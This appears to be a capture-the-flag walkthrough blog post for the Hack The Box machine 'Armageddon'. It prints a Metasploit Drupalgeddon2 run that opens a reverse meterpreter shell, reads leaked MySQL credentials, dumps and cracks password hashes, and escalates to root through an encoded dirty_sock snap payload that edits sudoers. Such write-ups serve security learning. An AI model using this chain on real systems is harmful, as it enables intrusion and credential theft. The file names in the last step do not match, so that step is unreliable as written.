Hack-The-Box-walkthrough[Armageddon]

Posted on 2021-03-29 Edited on 2021-07-25 In HackTheBox walkthrough Views: Word count in article: 1.6k Reading time ≈ 6 mins.

introduce

OS: Linux
Difficulty: Easy
Points: 20
Release: 27 Mar 2021
IP: 10.10.10.233

information gathering

first use nmap as usaul

┌──(root💀kali)-[~/hackthebox/machine/Armageddon]
└─# nmap -sV -v -p- --min-rate=10000 10.10.10.233
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)

So basically Two ports are opened 22:ssh 80:http

Port-80

There is a simple login page.
Let’s check the source code for some juicy stuff.

1	<meta name="Generator" content="Drupal 7 (http://drupal.org)" />

I found the drupal version “Drupal 7”.
Let’s search on google for exploit for this specific version.

Found a rapid7 page

Drupal Drupalgeddon 2 Forms API Property Injection

Let’s try this real quick.

msf6 > use exploit/unix/webapp/drupal_drupalgeddon2
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set lhost tun0
lhost => tun0
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rhost 10.10.10.233
rhost => 10.10.10.233
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > show options

Module options (exploit/unix/webapp/drupal_drupalgeddon2):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   DUMP_OUTPUT  false            no        Dump payload command output
   PHP_FUNC     passthru         yes       PHP function to execute
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS       10.10.10.233     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT        80               yes       The target port (TCP)
   SSL          false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI    /                yes       Path to Drupal install
   VHOST                         no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  tun0             yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic (PHP In-Memory)


msf6 exploit(unix/webapp/drupal_drupalgeddon2) > run

[*] Started reverse TCP handler on 10.10.14.5:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable.
[*] Sending stage (39282 bytes) to 10.10.10.233
[*] Meterpreter session 1 opened (10.10.14.5:4444 -> 10.10.10.233:59810) at 2021-03-29 07:57:22 -0400
id

meterpreter > id
[-] Unknown command: id.
meterpreter > getuid
Server username:  (48)
meterpreter > pwd
/var/www/html
meterpreter > ls
Listing: /var/www/html
======================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
100644/rw-r--r--  317     fil   2017-06-21 14:20:18 -0400  .editorconfig
100644/rw-r--r--  174     fil   2017-06-21 14:20:18 -0400  .gitignore
100644/rw-r--r--  6112    fil   2017-06-21 14:20:18 -0400  .htaccess
100644/rw-r--r--  111613  fil   2017-06-21 14:20:18 -0400  CHANGELOG.txt
100644/rw-r--r--  1481    fil   2017-06-21 14:20:18 -0400  COPYRIGHT.txt
100644/rw-r--r--  1717    fil   2017-06-21 14:20:18 -0400  INSTALL.mysql.txt
100644/rw-r--r--  1874    fil   2017-06-21 14:20:18 -0400  INSTALL.pgsql.txt
100644/rw-r--r--  1298    fil   2017-06-21 14:20:18 -0400  INSTALL.sqlite.txt
100644/rw-r--r--  17995   fil   2017-06-21 14:20:18 -0400  INSTALL.txt
100644/rw-r--r--  18092   fil   2016-11-16 18:57:05 -0500  LICENSE.txt
100644/rw-r--r--  8710    fil   2017-06-21 14:20:18 -0400  MAINTAINERS.txt
100644/rw-r--r--  5382    fil   2017-06-21 14:20:18 -0400  README.txt
100644/rw-r--r--  10123   fil   2017-06-21 14:20:18 -0400  UPGRADE.txt
100644/rw-r--r--  6604    fil   2017-06-21 14:20:18 -0400  authorize.php
100644/rw-r--r--  720     fil   2017-06-21 14:20:18 -0400  cron.php
40755/rwxr-xr-x   4096    dir   2017-06-21 14:20:18 -0400  includes
100644/rw-r--r--  529     fil   2017-06-21 14:20:18 -0400  index.php
100644/rw-r--r--  703     fil   2017-06-21 14:20:18 -0400  install.php
100777/rwxrwxrwx  119357  fil   2021-03-28 22:59:36 -0400  linlog.txt
40755/rwxr-xr-x   4096    dir   2020-12-04 05:10:24 -0500  misc
40755/rwxr-xr-x   4096    dir   2017-06-21 14:20:18 -0400  modules
40755/rwxr-xr-x   70      dir   2017-06-21 14:20:18 -0400  profiles
100644/rw-r--r--  2189    fil   2017-06-21 14:20:18 -0400  robots.txt
40755/rwxr-xr-x   261     dir   2017-06-21 14:20:18 -0400  scripts
100755/rwxr-xr-x  55      fil   2021-03-28 22:43:06 -0400  shell.sh
40755/rwxr-xr-x   75      dir   2017-06-21 14:20:18 -0400  sites
40755/rwxr-xr-x   94      dir   2017-06-21 14:20:18 -0400  themes
100644/rw-r--r--  19986   fil   2017-06-21 14:20:18 -0400  update.php
100644/rw-r--r--  2200    fil   2017-06-21 14:20:18 -0400  web.config
100644/rw-r--r--  417     fil   2017-06-21 14:20:18 -0400  xmlrpc.php

We got the shell.

Now let’s enumerate some good stuff.

I found an interesting file called settings.php inside /var/www/html/sites/default/ directory. which has contain mysql creads.

meterpreter > ls
Listing: /var/www/html/sites/default
====================================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100644/rw-r--r--  26250  fil   2017-06-21 14:20:18 -0400  default.settings.php
40775/rwxrwxr-x   37     dir   2020-12-03 07:32:39 -0500  files
100444/r--r--r--  26565  fil   2020-12-03 07:32:37 -0500  settings.php

meterpreter > cat settings.php
'''
$databases = array (
  'default' => 
  array (
    'default' => 
    array (
      'database' => 'drupal',
      'username' => 'drupaluser',
      'password' => 'CQHEy@9M*m23gBVj',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);
'''

But before connect to the mysql let’s spawn a stable shell first.

python3 tty shell doesn’t spawn So let’s try connect with mysql without tty shell.

mysql -u drupaluser -pCQHEy@9M*m23gBVj -e 'show databases;'
Database
information_schema
drupal
mysql
performance_schema

It’s work let’s fetch the tables inside drupal database.

mysql -u drupaluser -pCQHEy@9M*m23gBVj -D drupal -e 'show tables;'
Tables_in_drupal
actions
authmap
batch
block
block_custom
block_node_type
block_role
blocked_ips
cache
cache_block
cache_bootstrap
cache_field
cache_filter
cache_form
cache_image
cache_menu
cache_page
cache_path
comment
date_format_locale
date_format_type
date_formats
field_config
field_config_instance
field_data_body
field_data_comment_body
field_data_field_image
field_data_field_tags
field_revision_body
field_revision_comment_body
field_revision_field_image
field_revision_field_tags
file_managed
file_usage
filter
filter_format
flood
history
image_effects
image_styles
menu_custom
menu_links
menu_router
node
node_access
node_comment_statistics
node_revision
node_type
queue
rdf_mapping
registry
registry_file
role
role_permission
search_dataset
search_index
search_node_links
search_total
semaphore
sequences
sessions
shortcut_set
shortcut_set_users
system
taxonomy_index
taxonomy_term_data
taxonomy_term_hierarchy
taxonomy_vocabulary
url_alias
users
users_roles
variable
watchdog

Now let’s dump the username and hashes inside users table.

mysql -u drupaluser -pCQHEy@9M*m23gBVj -D drupal -e 'select name,pass from users;'
name    pass

brucetherealadmin       $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt
hacker  $S$DUnQhzNDVFOtAeb0JLMAtUesQM9iI1ZvcOixoulqd98XsmmEyE2b

Now we have the hashes let’s try to crack it.

┌──(root💀kali)-[~/hackthebox/machine/Armageddon]
└─# john hash -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (Drupal7, $S$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 32768 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
booboo           (?)

We got the password for brucetherealadmin:booboo

Let’s ssh in real quick and get the user.txt.

┌──(root💀kali)-[~/hackthebox/machine/Armageddon]
└─# ssh brucetherealadmin@10.10.10.233
The authenticity of host '10.10.10.233 (10.10.10.233)' can't be established.
ECDSA key fingerprint is SHA256:bC1R/FE5sI72ndY92lFyZQt4g1VJoSNKOeAkuuRr4Ao.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.233' (ECDSA) to the list of known hosts.
brucetherealadmin@10.10.10.233's password: 
Last login: Fri Mar 19 08:01:19 2021 from 10.10.14.5
[brucetherealadmin@armageddon ~]$ id
uid=1000(brucetherealadmin) gid=1000(brucetherealadmin) 组=1000(brucetherealadmin) 环境=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[brucetherealadmin@armageddon ~]$ whoami
brucetherealadmin
[brucetherealadmin@armageddon ~]$ ls
user.txt
[brucetherealadmin@armageddon ~]$ cat user.txt
da64e52c766febd51f05a14be029868f

Privilege escalation

Before running linpeas let’s try manually first.

[brucetherealadmin@armageddon ~]$ sudo -l
匹配 %2$s 上 %1$s 的默认条目：
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME
    HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
    LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
    env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

用户 brucetherealadmin 可以在 armageddon 上运行以下命令：
    (root) NOPASSWD: /usr/bin/snap install *

Let’s google it for Privilege escalation.

Privilege Escalation in Ubuntu Linux (dirty_sock exploit)
dirty_sockv2.py

This github python script doesn’t work in this case so in this script we only need the base64 string and then we decode the base64 string and save it in file.

[brucetherealadmin@armageddon tmp]$ python -c 'print "aHNxcwcAAAAQIVZcAAACAAAAAAAEABEA0AIBAAQAAADgAAAAAAAAAI4DAAAAAAAAhgMAAAAAAAD//////////xICAAAAAAAAsAIAAAAAAAA+AwAAAAAAAHgDAAAAAAAAIyEvYmluL2Jhc2gKCnVzZXJhZGQgZGlydHlfc29jayAtbSAtcCAnJDYkc1daY1cxdDI1cGZVZEJ1WCRqV2pFWlFGMnpGU2Z5R3k5TGJ2RzN2Rnp6SFJqWGZCWUswU09HZk1EMXNMeWFTOTdBd25KVXM3Z0RDWS5mZzE5TnMzSndSZERoT2NFbURwQlZsRjltLicgLXMgL2Jpbi9iYXNoCnVzZXJtb2QgLWFHIHN1ZG8gZGlydHlfc29jawplY2hvICJkaXJ0eV9zb2NrICAgIEFMTD0oQUxMOkFMTCkgQUxMIiA+PiAvZXRjL3N1ZG9lcnMKbmFtZTogZGlydHktc29jawp2ZXJzaW9uOiAnMC4xJwpzdW1tYXJ5OiBFbXB0eSBzbmFwLCB1c2VkIGZvciBleHBsb2l0CmRlc2NyaXB0aW9uOiAnU2VlIGh0dHBzOi8vZ2l0aHViLmNvbS9pbml0c3RyaW5nL2RpcnR5X3NvY2sKCiAgJwphcmNoaXRlY3R1cmVzOgotIGFtZDY0CmNvbmZpbmVtZW50OiBkZXZtb2RlCmdyYWRlOiBkZXZlbAqcAP03elhaAAABaSLeNgPAZIACIQECAAAAADopyIngAP8AXF0ABIAerFoU8J/e5+qumvhFkbY5Pr4ba1mk4+lgZFHaUvoa1O5k6KmvF3FqfKH62aluxOVeNQ7Z00lddaUjrkpxz0ET/XVLOZmGVXmojv/IHq2fZcc/VQCcVtsco6gAw76gWAABeIACAAAAaCPLPz4wDYsCAAAAAAFZWowA/Td6WFoAAAFpIt42A8BTnQEhAQIAAAAAvhLn0OAAnABLXQAAan87Em73BrVRGmIBM8q2XR9JLRjNEyz6lNkCjEjKrZZFBdDja9cJJGw1F0vtkyjZecTuAfMJX82806GjaLtEv4x1DNYWJ5N5RQAAAEDvGfMAAWedAQAAAPtvjkc+MA2LAgAAAAABWVo4gIAAAAAAAAAAPAAAAAAAAAAAAAAAAAAAAFwAAAAAAAAAwAAAAAAAAACgAAAAAAAAAOAAAAAAAAAAPgMAAAAAAAAEgAAAAACAAw" + "A" * 4256 + "=="' | base64 -d > dedsec.snap

run the following commands and we got root

[brucetherealadmin@armageddon tmp]$ ls
luci.snap
[brucetherealadmin@armageddon tmp]$ sudo /usr/bin/snap install --devmode luci.snap
dirty-sock 0.1 installed
[brucetherealadmin@armageddon tmp]$ su dirty_sock
密码：
[dirty_sock@armageddon tmp]$ sudo -i

我们信任您已经从系统管理员那里了解了日常注意事项。
总结起来无外乎这三点：

    #1) 尊重别人的隐私。
    #2) 输入前要先考虑(后果和风险)。
    #3) 权力越大，责任越大。

[sudo] dirty_sock 的密码：
[root@armageddon ~]# id
uid=0(root) gid=0(root) 组=0(root) 环境=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[root@armageddon ~]# whoami
root
[root@armageddon ~]# ls
anaconda-ks.cfg  cleanup.sh  passwd  reset.sh  root.txt  snap
[root@armageddon ~]# cat root.txt
2ff5df0cda6758a019dc1481ff002da1